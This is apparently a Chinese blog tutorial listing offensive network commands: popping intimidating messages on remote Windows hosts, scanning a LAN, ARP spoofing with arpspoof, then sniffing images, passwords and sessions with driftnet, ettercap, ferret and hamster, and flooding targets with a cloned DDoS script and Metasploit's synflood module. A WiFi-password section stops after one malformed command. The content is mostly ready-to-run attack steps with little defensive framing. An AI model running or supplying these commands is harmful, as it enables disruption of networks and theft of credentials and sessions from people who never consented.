一,windows环境命令进行

一,发送信息类
1.利用msg进行发送消息

msg /server:192.168.123.141 * "你的电脑已经被入侵"
#语法
msg server:(ip) * "消息内容"

注意事项
①获取会话名称时的错误1722
原因:RPC(一种调用模型)服务器不可用
解决方法:
win+r运行regedit.exe,找到"计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"把AllowRemoteRPC的值从0改为1就能接受信息了。
②获取会话名称时的错误5
造成原因:–>无用户凭据导致
解决方法:–>以管理员身份运行即可
③msg不是内部或外部命令
造成原因:–>无环境变量导致
解决方法:–>添加环境变量即可解决

2.老版本
利用net send 发送信息类

net send ip 信息
#如net send 192.168.123.94 sb

二.工具进行

arp攻击

1.检查以及获取网段
即查看局域网存活主机

fping -asg 192.168.1.1/24 
或者-->nmap -sP ip
扫描常用的端口-->nmap -F -sT -v nmap.org

注意点:
①攻击者的IP和被攻击者的IP需要在同一个网段中(即需要两个ip段可以连接ping通)
②默认的网卡必须是eth0
–>如
在这里插入图片描述
2.攻击方法

echo 1 >/proc/sys/net/ipv4/ip_forward
#即开启端口转发功能
arpspoof -i eth0 -t  192.168.1.1  192.168.1.104
#即 前面的IP是靶机的IP,后面的IP是攻击者的ip 即将该ip欺骗到其他上面的状况特点-->断网攻击
#arpspoof -i 网卡 -t  网关 目标IP
driftnet -i eth0 
#窃取受害者的图片
ettercap -Tq -i eth0
#ettercap -i 网卡 -Tq -M
#进行账号密码嗅探-->即抓取账号密码状况特点
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安装)
hamster
http://hamster
#session劫持

即arpspoo攻击成功后进行嗅探密码的状况特点
在这里插入图片描述

DOS/DDOS攻击

方法1

①安装ddos攻击模块

git clone https://github.com/Ha3MrX/DDos-Attack

②进入DDos-Attack且运行文件

cd DDos-Attack
ls
python  ddos-attack.py 

在这里插入图片描述
③输入目标的ip以及端口即可以进行攻击
在这里插入图片描述

方法2

利用Metasploit模块进行实现

#进入msf模块中
msfconsole
#进入潮汐攻击目录
use auxiliary/dos/tcp/synflood
set rhost 目标服务器
#执行
exploit

如 把自己的服务器拿来做测试做的一个小的攻击
在这里插入图片描述

窃取wifi密码

#扫描局域网范围中的wifi
airodump-ngwlan0mon
#

案例

Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐